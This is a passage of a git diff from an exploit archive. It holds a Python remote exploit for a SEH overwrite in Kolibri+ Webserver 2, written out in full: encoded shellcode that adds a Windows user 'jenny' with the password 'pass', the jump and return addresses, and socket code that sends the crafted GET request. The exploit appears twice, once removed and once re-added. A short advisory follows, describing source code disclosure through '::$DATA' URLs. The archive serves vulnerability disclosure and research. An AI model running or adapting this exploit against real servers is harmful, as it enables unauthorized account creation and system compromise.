not get this to work on XP SP3. php5ts.dll is the only module with safe seh off but could not get the pop pop ret -# to work correctly despite the large number of usable addresses that were tested. -# -# $ ./kolibri.py 192.168.1.146 8080 -# -# [*] Kolibri+ Webserver 2 SEH Overwrite -# [*] Written by blake -# [*] Tested on Windows XP SP 1 -# [*] Denial of Service found by Usman Saeed -# -# [+] Connecting to 192.168.1.146 on port 8080 -# [+] Sending payload -# [+] Done. User jenny created with the password of pass on 192.168.1.146 - -import socket, sys - -print "\n[*] Kolibri+ Webserver 2 SEH Overwrite" -print "[*] Written by blake" -print "[*] Tested on Windows XP SP 1" -print "[*] Denial of Service found by Usman Saeed\n" - -if len(sys.argv)!= 3: - print "[*] Usage: %s <ip> <port>" - sys.exit(0) - -host = sys.argv[1] -port = int(sys.argv[2]) - -# windows/adduser - 446 bytes Encoder: x86/alpha_mixed -# USER=jenny, EXITFUNC=seh, PASS=pass - -shellcode = ( -"\x89\xe6\xdb\xc8\xd9\x76\xf4\x5f\x57\x59\x49\x49\x49\x49\x49" -"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" -"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" -"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" -"\x4b\x4c\x4b\x58\x47\x34\x45\x50\x43\x30\x43\x30\x4c\x4b\x50" -"\x45\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x42\x58\x43\x31\x4a\x4f" -"\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a" -"\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x45\x51\x4a\x4e\x50\x31" -"\x49\x50\x4c\x59\x4e\x4c\x4b\x34\x49\x50\x44\x34\x45\x57\x49" -"\x51\x48\x4a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4b\x44\x47\x4b" -"\x51\x44\x51\x34\x45\x54\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x46" -"\x44\x45\x51\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b" -"\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45" -"\x51\x4a\x4b\x4b\x39\x51\x4c\x47\x54\x45\x54\x49\x53\x51\x4f" -"\x50\x31\x4a\x56\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46\x50" -"\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d" -"\x4c\x4b\x43\x58\x45\x58\x4d\x59\x4a\x58\x4c\x43\x49\x50\x42" -"\x4a\x50\x50\x45\x38\x4c\x30\x4c\x4a\x44\x44\x51\x4f\x43\x58" -"\x4a\x38\x4b\x4e\x4c\x4a\x44\x4e\x46\x37\x4b\x4f\x4a\x47\x42" -"\x43\x42\x4d\x43\x54\x46\x4e\x43\x55\x43\x48\x43\x55\x51\x30" -"\x46\x4f\x42\x43\x51\x30\x42\x4e\x42\x45\x44\x34\x47\x50\x44" -"\x35\x42\x53\x45\x35\x43\x42\x51\x30\x43\x5a\x43\x55\x42\x4e" -"\x42\x4e\x43\x49\x47\x50\x42\x50\x43\x51\x43\x43\x43\x43\x51" -"\x30\x46\x4f\x51\x51\x51\x54\x51\x54\x51\x30\x51\x36\x47\x56" -"\x47\x50\x42\x4e\x45\x35\x44\x34\x47\x50\x42\x4c\x42\x4f\x43" -"\x53\x43\x51\x42\x4c\x43\x57\x42\x52\x42\x4f\x42\x55\x44\x30" -"\x51\x30\x51\x51\x45\x34\x42\x4d\x42\x49\x42\x4e\x45\x39\x44" -"\x33\x44\x34\x43\x42\x43\x51\x44\x34\x42\x4f\x42\x52\x43\x43" -"\x47\x50\x43\x5a\x45\x35\x42\x4e\x42\x4e\x43\x49\x51\x30\x46" -"\x4f\x47\x31\x51\x54\x47\x34\x43\x30\x41\x41") - -payload = "\x41" * 8 # junk buffer -payload += "\x90" * 10 # nop sled -sc = shellcode # 446 bytes of shellcode -jump_near = "\xe9\x34\xfe\xff\xff" # jump near -460 bytes -next_seh = "\xeb\xf9\xff\xff" # short jump back -7 bytes -seh = "\x6f\x2a\xe6\x77" # p/p/r from kernel32.dll -junk = "\x41" * 424 # junk buffer - -print "[+] Connecting to %s on port %d" % (host,port) -s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) -try: - s.connect((host,port)) - print "[+] Sending payload" - s.send("GET /index.html" + payload + sc + jump_near + next_seh + seh + junk + " HTTP/1.0\r\n\r\n") - s.close() - print "[+] Done. User jenny created with the password of pass on %s\n" % host -except: - print "[x] Could not connect!" - -# milw0rm.com [2009-09-11] +#!/usr/bin/python +# +# Could not get this to work on XP SP3. php5ts.dll is the only module with safe seh off but could not get the pop pop ret +# to work correctly despite the large number of usable addresses that were tested. +# +# $ ./kolibri.py 192.168.1.146 8080 +# +# [*] Kolibri+ Webserver 2 SEH Overwrite +# [*] Written by blake +# [*] Tested on Windows XP SP 1 +# [*] Denial of Service found by Usman Saeed +# +# [+] Connecting to 192.168.1.146 on port 8080 +# [+] Sending payload +# [+] Done. User jenny created with the password of pass on 192.168.1.146 + +import socket, sys + +print "\n[*] Kolibri+ Webserver 2 SEH Overwrite" +print "[*] Written by blake" +print "[*] Tested on Windows XP SP 1" +print "[*] Denial of Service found by Usman Saeed\n" + +if len(sys.argv)!= 3: + print "[*] Usage: %s <ip> <port>" + sys.exit(0) + +host = sys.argv[1] +port = int(sys.argv[2]) + +# windows/adduser - 446 bytes Encoder: x86/alpha_mixed +# USER=jenny, EXITFUNC=seh, PASS=pass + +shellcode = ( +"\x89\xe6\xdb\xc8\xd9\x76\xf4\x5f\x57\x59\x49\x49\x49\x49\x49" +"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" +"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" +"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +"\x4b\x4c\x4b\x58\x47\x34\x45\x50\x43\x30\x43\x30\x4c\x4b\x50" +"\x45\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x42\x58\x43\x31\x4a\x4f" +"\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a" +"\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x45\x51\x4a\x4e\x50\x31" +"\x49\x50\x4c\x59\x4e\x4c\x4b\x34\x49\x50\x44\x34\x45\x57\x49" +"\x51\x48\x4a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4b\x44\x47\x4b" +"\x51\x44\x51\x34\x45\x54\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x46" +"\x44\x45\x51\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b" +"\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45" +"\x51\x4a\x4b\x4b\x39\x51\x4c\x47\x54\x45\x54\x49\x53\x51\x4f" +"\x50\x31\x4a\x56\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46\x50" +"\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d" +"\x4c\x4b\x43\x58\x45\x58\x4d\x59\x4a\x58\x4c\x43\x49\x50\x42" +"\x4a\x50\x50\x45\x38\x4c\x30\x4c\x4a\x44\x44\x51\x4f\x43\x58" +"\x4a\x38\x4b\x4e\x4c\x4a\x44\x4e\x46\x37\x4b\x4f\x4a\x47\x42" +"\x43\x42\x4d\x43\x54\x46\x4e\x43\x55\x43\x48\x43\x55\x51\x30" +"\x46\x4f\x42\x43\x51\x30\x42\x4e\x42\x45\x44\x34\x47\x50\x44" +"\x35\x42\x53\x45\x35\x43\x42\x51\x30\x43\x5a\x43\x55\x42\x4e" +"\x42\x4e\x43\x49\x47\x50\x42\x50\x43\x51\x43\x43\x43\x43\x51" +"\x30\x46\x4f\x51\x51\x51\x54\x51\x54\x51\x30\x51\x36\x47\x56" +"\x47\x50\x42\x4e\x45\x35\x44\x34\x47\x50\x42\x4c\x42\x4f\x43" +"\x53\x43\x51\x42\x4c\x43\x57\x42\x52\x42\x4f\x42\x55\x44\x30" +"\x51\x30\x51\x51\x45\x34\x42\x4d\x42\x49\x42\x4e\x45\x39\x44" +"\x33\x44\x34\x43\x42\x43\x51\x44\x34\x42\x4f\x42\x52\x43\x43" +"\x47\x50\x43\x5a\x45\x35\x42\x4e\x42\x4e\x43\x49\x51\x30\x46" +"\x4f\x47\x31\x51\x54\x47\x34\x43\x30\x41\x41") + +payload = "\x41" * 8 # junk buffer +payload += "\x90" * 10 # nop sled +sc = shellcode # 446 bytes of shellcode +jump_near = "\xe9\x34\xfe\xff\xff" # jump near -460 bytes +next_seh = "\xeb\xf9\xff\xff" # short jump back -7 bytes +seh = "\x6f\x2a\xe6\x77" # p/p/r from kernel32.dll +junk = "\x41" * 424 # junk buffer + +print "[+] Connecting to %s on port %d" % (host,port) +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +try: + s.connect((host,port)) + print "[+] Sending payload" + s.send("GET /index.html" + payload + sc + jump_near + next_seh + seh + junk + " HTTP/1.0\r\n\r\n") + s.close() + print "[+] Done. User jenny created with the password of pass on %s\n" % host +except: + print "[x] Could not connect!" + +# milw0rm.com [2009-09-11] diff --git a/platforms/windows/remote/9650.txt b/platforms/windows/remote/9650.txt index ddd1d19da..4b80c9829 100755 --- a/platforms/windows/remote/9650.txt +++ b/platforms/windows/remote/9650.txt @@ -1,28 +1,28 @@ -################################################################################# -# # -# Kolibri+ Web Server 2 Remote Arbitrary Source Code Disclosure # -# aka: More fun with Kolibri+ 2 webserver # -# Found By: Dr_IDE # -# Tested On: Windows XPSP3 # -# # -################################################################################# - -- Description - - -Kolibri+ 2 Web Server is a Windows based HTTP server. This is the latest version of -the application available. - -This vulnerability is similar to the one reported earlier by Skull-HacKeR. - -Kolibri+ 2 is vulnerable to remote arbitrary source code disclosure -(download in this case) by the following means. - -- Technical Details - - - http://[ webserver IP]/[ file ][::$DATA] - - http://172.16.2.101/default.asp::$DATA - - http://172.16.2.101/index.php::$DATA - -# milw0rm.com [2009-09-11] +################################################################################# +# # +# Kolibri+ Web Server 2 Remote Arbitrary Source Code Disclosure # +# aka: More fun with Kolibri+ 2 webserver # +# Found By: Dr_IDE # +# Tested On: Windows XPSP3 # +# # +################################################################################# + +- Description - + +Kolibri+ 2 Web Server is a Windows based HTTP server. This is the latest version of +the application available. + +This vulnerability is similar to the one reported earlier by Skull-HacKeR. + +Kolibri+ 2 is vulnerable to remote arbitrary source code disclosure +(download in this case) by the following means. + +- Technical Details - + + http://[ webserver IP]/[ file ][::$DATA] + + http://172.16.2.101/default.asp::$DATA + + http://172.16.2.101/index.php::$DATA + +# milw0rm.com [2009-09-11]